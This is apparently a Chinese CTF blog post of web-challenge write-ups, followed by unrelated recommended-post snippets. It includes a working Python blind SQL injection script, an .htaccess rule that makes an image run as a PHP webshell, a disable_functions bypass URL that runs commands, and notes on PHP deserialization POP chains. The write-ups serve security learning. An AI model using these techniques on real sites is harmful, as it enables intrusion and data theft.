Web题记

已于 2024-03-07 21:19:54 修改
阅读量807 收藏 24
点赞数 18
文章标签: 前端 android
于 2024-03-07 21:19:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73867210/article/details/136486885
版权

[CISCN 2019华北Day2]Web1

告诉我们想要的东西在flag表和flag字段,那应该是sql注入,先试试

试了一些发现会被检查到,随便传数字

 除了1和2有返回结果,其余的都报错,应该是数字型注入,抓包看看过滤了哪些

 这个字典好像不太完整,又找了一个,感谢大佬:sql-fuzz字典

使用异或盲注测试

 脚本盲注:

import requests
import time

url = "http://node4.anna.nssctf.cn:28316/index.php"
payload = {
	"id" : ""
}
result = ""
for i in range(1,100):
	l = 33
	r =130
	mid = (l+r)>>1
	while(l<r):
		payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
		html = requests.post(url,data=payload)
		print(payload)
		if "Hello" in html.text:
			l = mid+1
		else:
			r = mid
		mid = (l+r)>>1
	if(chr(mid)==" "):
		break
	result = result + chr(mid)
	print(result)
print("flag: " ,result)

还有一种看到说是用if,但是if有局限性,这题是数字型 ,可以直接select * from users where id=if(1=1,1,0),但如果id单引号字符型或双引号字符型,那就必须在if前加or或and,但是

我这个好像没成功,也不知道怎么回事

[CISCN 2023 西南]do_you_like_read 

进来是一个购物的界面,右下角看到有个登陆的

试一下弱口令

 登陆后看到有文件上传的漏洞

 直接上传试一试,上传后没发现有啥,看别的博主都是通过对源码审计,对php相关的后缀进行了省略,通过.htaccess配置文件,记得好像之前刷过类似的,也是利用这个,配置文件内容:

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>

然后上传图片马,但是不知道为啥我一直连不上,看别人的后面的是蚁剑连接上之后权限不够,所以又转换思路在源码找到利用点,绕过disable_function造成RCE,别的大佬的解释:

最后的路径:

/bootstrap/test/bypass_disablefunc.php?cmd=env&outpath=/var/www/html/bootstrap/1.txt&sopath=/var/www/html/bootstrap/test/bypass_disablefunc_x64.so

 

[SWPUCTF 2021 新生赛]pop

POP链就是利用魔法方法在里面进行多次跳转然后获取敏感数据的一种payload

常见魔术方法:

__construct()	类的构造函数,在对象实例化时调用
__destruct()	类的析构函数,在对象被销毁时被调用
__call()		在对象中调用一个不可访问的对象时被调用,比如一个对象被调用时,里面没有程序想调用的属性
__get()			个人觉得和call函数类似
__isset()		当一个对象调用isset()或empty()时被调用
__sleep()		执行serialize()时,先会调用这个函数
__wakeup()		执行unserialize()时,先会调用这个函数,改属性键值可绕过
__toString()	类被当成字符串时被调用,如出现echo或者pre_match时
__invoke()		以函数的形式调用一个对象时被调用
__clone()		出现clone函数,会被调用
__callStatic() //在静态上下文中调用不可访问的方法时触发
__unset()       当对不可访问属性调用unset()时被调用。

思路:先使用w22m的echo函数去输出w33m类,然后w33m的类调用toString里面的\$this->w00m->{\$this->w22m}();,将w00m赋值为w44m,将w22m赋值为Getflag,再将w44m的admin和passwd赋值为题目给出的数,从而读取flag ,构造链子

注意:

private的意思是私有的,protected是受保护的,这两个不能再类外部进行赋值,所以只能在类内部进行定义。

由于使用了privateprotected,所以在序列化的时候,会产生%00,但是%00会直接被忽略掉,所以这里要使用url编码,对整个payload进行编码,避免%00被忽略,引起不必要的失误

 [SWPUCTF 2021 新生赛]no_wakeup

__wakeup() 魔术方法在执行反序列化时,会被优先调用,而不会调用 __construct 方法。
__wakeup() 函数漏洞原理:当序列化字符串表示对象属性个数的值大于真实个数的属性时就会跳过__wakeup的执行

orange-snow
关注
  • 18
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
数据结构题记(C语言版)
05-25
数据结构题记(C语言版)
数据结构题记
10-06
数据结构题集 严蔚敏.pdf数据结构习题集严蔚敏.pdf
Web 题记
m0_73867210的博客
11-30 916
分析代码,和平时不一样,有一个点:如何从get()->__tostring(),tostring的触发条件是当一个类对象被当作字符串时触发,那么显然我们想触发tostring,需要利用die这个函数,但我们在调用die之前调用了miaomiao这个方法,将a进行了提前赋值,这个时候可以看到die()前面的一串:this->gao=$this->fei;然后还有check函数以及基础的传参trick需要绕过,去网上搜一搜绕过方式,备注:php会将所传参数中的不合法符号替换为“_”构造链子。
ctfshow web题记
m0_73867210的博客
03-01 928
看了这个有点懂了,因为将'过滤了所以我们需要用\'来代替',而要让这个语句永远为真则可以构造||1,后面的#也是为了注释掉最后面的\',将前面的语句闭合起来,这样就形成了'xxxx'||1,永为真。这个比较用的是强比较,会先判断两种字符串的类型是否相等,再比较值是否相等,后面的函数可参考上一题的用法,只不过这一题里面的base为0,可以用八进制或者十六进制绕过。sql语句这里也没学的咋好就看别人的解题步骤了,先用单引号闭合,发现没啥变化,然后用\,发现出现在了返回的语句中。常用于强制类型转换。
攻防世界web新手区题记-下
outman23的博客
03-14 91
weak-auth 进入场景,随便试了一个,出现如下提示 说明用户名为“admin",密码用了下字典,测试通过,通过burp抓包也可以, 然后得到flag simple-php 此题考查php语言的理解 大概意思为 a参数的要求 a必须等于0且a为真 b参数的要求 b不能为数字且b大于1234 在url后面加入指令就得到FLAG ...
Web.xml详解
Away_summer的博客
10-23 239
转载自:http://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,看完自己对这个配置文件有了很直观的理解,以后会经常拿来阅读,怕找不到原文就转载过来了。希望对大家有所帮助,也欢迎大家一起讨论。 —题记 Web.xml详解: 1.web.xml加载过程(步骤) 首先简单讲一下,web.xml...
攻防世界web新手区题记
outman23的博客
02-28 221
view source 先进入题目 得到一个空白网站 然后不能右键查看源码,再f12 得到flag cyberpeace{7485d039a7d75614ebd5b7469d2f539b} robots 这里百度了一下robots协议, robots.txt文件是一个文本文件,使用任何一个常见的文本编辑器,比如Windows系统自带的Notepad,就可以创建和编辑它 [1] 。robots.txt是一个协议,而不是一个命令。robots.txt是搜索引擎中访问网站的时候要查看的第一个文件。robo
web前端学习书单
wuxy720
12-25 434
web前端学习书单
CTF题记—ctfshow&&BUU
m0re's blog
10-03 2649
web19 题目描述:密钥什么的,就不要放在前端了 打开题目是登录框,第一想法是去尝试了万能密码。但是没有成功。然后才回过头看题目描述是前端有密钥。所以就看源代码。 上面是加密方法,百度发现是前端AES加密。它会将用户输入的密码字符串进行加密。两种可行方法,第一种是解密,先百度,然后这样这样,再那样那样就解出来了。(没有使用这种)。第二种是抓包修改,绕过前端验证。将密钥修改为$p的字符串。发包得到flag web 7、8 题目描述:版本控制很重要,但不要部署到生产环境更重要。 版本信息部署到生产环境,两
CTF题记——详谈两道Web
m0re's blog
11-02 1142
前言 最近学校也在招新,基本没什么时间做题,最近也很少发博客。就写几道题来充充数吧。 正文 fakebook 我的思路呢,只有一点沾边了,记一下现在的思考: 注册了一个username就找不到其他信息了,然后考虑了源码泄露。找了robots.txt,发现了一个user.php.bak,访问得到泄露的文件。是这样 <?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; p
Web.xml配置详解
Bruce_Up的博客
10-26 563
版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/believejava/article/details/43229361 这篇文章主要是综合网上关于web.xml的一些介绍,希望对大家有所帮助,也欢迎大家一起讨论。 ---题记 Web.xml详解...
我的搜索题记整理
10-30
根据给定的信息,我们可以从这段代码中提取出两个主要的IT知识点:广度优先搜索(Breadth-First Search, BFS)与深度优先搜索(Depth-First Search, DFS)。接下来,我们将详细介绍这两个算法及其在代码中的应用。...
题记优秀作文范例.doc
09-28
1. 题记的运用:文章开头的"题记"是一种文学手法,用来引出主题或设定情感基调。在这个例子中,每个作者都用题记表达了对特定人物的赞美和深情。 2. 描述场景:作者通过描绘环境细节,如春日、海棠前的老塔钟、教室...
Java 公司面试的面试题记
04-22
Java公司面试通常会涵盖多个方面的知识点,包括但不限于基础语法、面向对象编程、集合框架、多线程、异常处理、内存管理、JVM调优、设计模式、数据库操作、网络编程、Spring框架及其生态等。以下是对这些核心领域的...
前端Web-JavaScript(上)
Yu2uki的博客
07-31 1327
JavaScript(简称:JS) 是一门跨平台、面向对象的脚本语言,是用来控制网页行为的,实现人机交互效果。JavaScript 和 Java 是完全不同的语言,不论是概念还是设计。但是基础语法类似。组成:ECMAScript: 规定了JS基础语法核心知识,包括变量、数据类型、流程控制、函数、对象等。BOM:浏览器对象模型,用于操作浏览器本身,如:页面弹窗、地址栏操作、关闭窗口等。DOM:文档对象模型,用于操作HTML文档,如:改变标签内的内容、改变标签内字体样式等。
高德地图离线版 使用高德地图api的方法
最新发布
m0_62336925的博客
08-02 294
然因为高德地图的瓦片地图太大,所以要让后端部署下 前端直接调用 如果本地 直接找到瓦片图路径就可以。这个代码把你想用的方法名保存到本地。这个时候会报错 因为没有这个方法。然后就可以正常使用这个方法拉。然后使用他的离线方法。找到对应的名字 复制。
【分享】前端程序员-技术网站推荐
一位前行者的博客
07-30 873
对于前端开发人员来说,以下是一些推荐的技术网站,这些网站提供了丰富的资源和知识,可以帮助你提升前端开发技能:收集一些 、、 的网站 vite 官方中文文档 element-plus 官方中文文档 pinia 官方中文文档 vue-router 官方中文文档 Tailwind CSS 官方文档 vitest 官方中文文档 es6 中文文档 axios 官方中文文档 vxetable 官方中文文档 lodash 中文文档 echarts 官方中文文档 animat
前端面试:项目细节重难点问题分享(十四)
weixin_49062485的博客
08-02 318
更多详情:爱米的前端小笔记(csdn~xitujuejin~zhiHu~Baidu~小红shu)同步更新,等你来看!都是利用下班时间整理的,整理不易,大家多多👍💛➕🤔哦!你们的支持才是我不断更新的动力!
男女,由朋友到恋人到夫妻。写一篇情感题记
09-23
### 回答1: 男女之间的爱情,源自朋友之间的善良,升华为恋人相互的珍重,最终演变成夫妻之间真挚的爱情。无论是从朋友到恋人,还是从恋人到夫妻,它们都有着共同的特点:坚定的信任、坚实的依赖、深沉的爱恋。 朋友之间,可以是一种无言的了解,也可以是熟悉的笑容,虽然不像恋人之间那样深情,但也有着温暖的爱意。只要朋友之间的感情坚固,就可以把这份友谊深化,发展成恋爱关系。恋人之间,开始可能只是一种牵动心弦的吸引,但随着相处越来越长,一种熟悉和依赖也会逐渐形成,双方也会越来越了解彼此,对对方的爱更加贴心。夫妻之间,是一种共同承担责任的爱,也是一种坚定不移的承诺。夫妻相互扶持,在困难时帮助彼此,在幸福时分享快乐,相互扶持,造就了一个完美的家庭。男女之间的爱情,从朋友到恋人,再到夫妻,走过的路都是那么的美好,愿每一份爱情都能够承受时间的考验,抵达最后的彼岸。 ### 回答2: 朋友,是一种伴我笑,伴我闹的亲密关系。我们分享喜悦,诉说心情,无拘无束地相互扶持。然而,在这个纷繁复杂的世界里,友情是那样的单纯而珍贵,它并不常常转变成恋情。然而,有些幸运的人却从朋友角色中逐渐渗透进了爱的领域。 我们的关系像水般悄无声息地发生着改变,从朋友到恋人。那是一份互相吸引的力量,仿佛有一股无形的纽带将我们紧密联系在一起。我们不再只是谈论琐事,而开始分享更深层次的感情。每一次相遇都像是缠绵的一吻,每一句问候都蓄满了柔情蜜意。 我们的爱情在细水长流中承载着我们的梦想和希望,以成为一对有情有义的夫妻。我们相信彼此,彼此信任、关心和支持。我们渴望通过婚姻的誓约,将这份爱 perpetuated 到永远。 但婚姻更像是一个新的起点,一个完全陌生的领域。我们将面临更多的责任和挑战,我们需要学会更多的忍耐、理解和包容。然而,我相信我们的坚定信念将会支撑我们的爱。在每个挫折面前,我们会紧握对方的手,共同面对人生的风雨。我们的夫妻关系将成为两颗心紧密相连的羁绊,永远无法割舍。 朋友,恋人,夫妻,这是一个演替的剧本。我们从一个角色转变为另一个,经历着不同的人生阶段。然而,我们的情感始终如一,不断升华。我们的爱不仅仅是悦目的表象,而是一种深入灵魂的契约。无论走到何处,我们将始终携手共进,共同创造美好的回忆。 ### 回答3: 朋友,是一个人生中最美好的礼物。当我们与心灵相投的人成为朋友,情感的种子悄然埋下,温暖的友谊之花在我们心中绽放。然而,有时候,友谊的边界并不止于此。当两个灵魂开始互相吸引,友情之上的情感便默默滋生,演变为一段美丽的恋情。 从朋友到恋人,这个过程接踵而来。我们开始对对方产生更多的非分之想,有了愈发深入的了解和真心的关心。我们乐于分享心事,乐于倾听对方的痛苦和喜悦。友谊之间的默契和信任,成为我们之间恋爱的基石。 在爱情的土壤里,我们的关系逐渐变得亲密而温暖。我们体验到彼此之间的亲密接触,感受到心弦上那动人的共鸣。我们能够在对方身上找到安慰和支持,一同度过人生的喜怒哀乐。 终于,我们迈入了夫妻的殿堂。这是一个承诺,表明我们决心一生一世守护对方、彼此相伴。婚姻不仅仅意味着爱情的牢牢束缚,更是两颗心彼此紧紧相连的象征。我们相信,这份爱将带给我们无尽的欢乐和充实,使我们的人生更加完整。 友谊可以演变成深厚的爱情,一对恋人可以成为携手走过一生的夫妻。这种发展,是源于我们共同的成长和理解,以及对彼此不断的包容和宽容。我们的情感经历了这样的转变,茁壮成长,让我们的心灵从相识到相知,从相知到相守。 友情、爱情和婚姻,是人生旅途上的三层境界。无论何时何地,这些情感都会陪伴我们度过平凡和特殊的日子。愿我们的友谊转变为永恒的爱情,成为相伴一生的伴侣,共同书写一段幸福的篇章。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值